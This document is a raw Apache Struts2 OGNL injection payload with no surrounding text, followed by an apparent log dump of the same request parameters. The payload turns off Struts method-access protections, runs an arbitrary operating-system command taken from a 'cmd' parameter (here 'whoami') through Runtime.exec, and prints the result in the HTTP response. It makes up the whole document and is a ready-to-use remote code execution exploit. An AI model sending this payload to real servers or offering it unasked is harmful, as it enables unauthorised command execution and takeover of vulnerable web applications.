

('\43_memberAccess.allowStaticMethodAccess')(a)=true&
(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&
('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&
(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&
(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&
(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&
(i01)(('\43webStr\75new\40byte[51020]')(d))&
(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&
(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&
(i2)(('\43spwn\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&
(i2)(('\43spwn\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&
(i95)(('\43spwn.getWriter().println(\43webStr12)')(d))&
(i99)(('\43spwn.getWriter().close()')(d))&
cmd=whoami

{('\43_memberAccess.allowStaticMethodAccess')(a)=[Ljava.lang.String;@bc7fa0,
(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))=[Ljava.lang.String;@15f0ac9,
('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))=[Ljava.lang.String;@adcc49,
(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))=[Ljava.lang.String;@bd15e6, (h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter("cmd"))')(d))=[Ljava.lang.String;@1e8e8dd, (i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))=[Ljava.lang.String;@100c4d, (i01)(('\43webStr\75new\40byte[51020]')(d))=[Ljava.lang.String;@197aef5, (i1)(('\43webRootzproreader.readFully(\43webStr)')(d))=[Ljava.lang.String;@15f83c0, (i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))=[Ljava.lang.String;@1c2c671, (i2)(('\43spwn\75@org.apache.struts2.ServletActionContext@getResponse()')(d))=[Ljava.lang.String;@725e09, (i95)(('\43spwn.getWriter().println(\43webStr12)')(d))=[Ljava.lang.String;@7bd049, (i99)(('\43spwn.getWriter().close()')(d))=[Ljava.lang.String;@a79601, 
cmd=[Ljava.lang.String;@693081}




























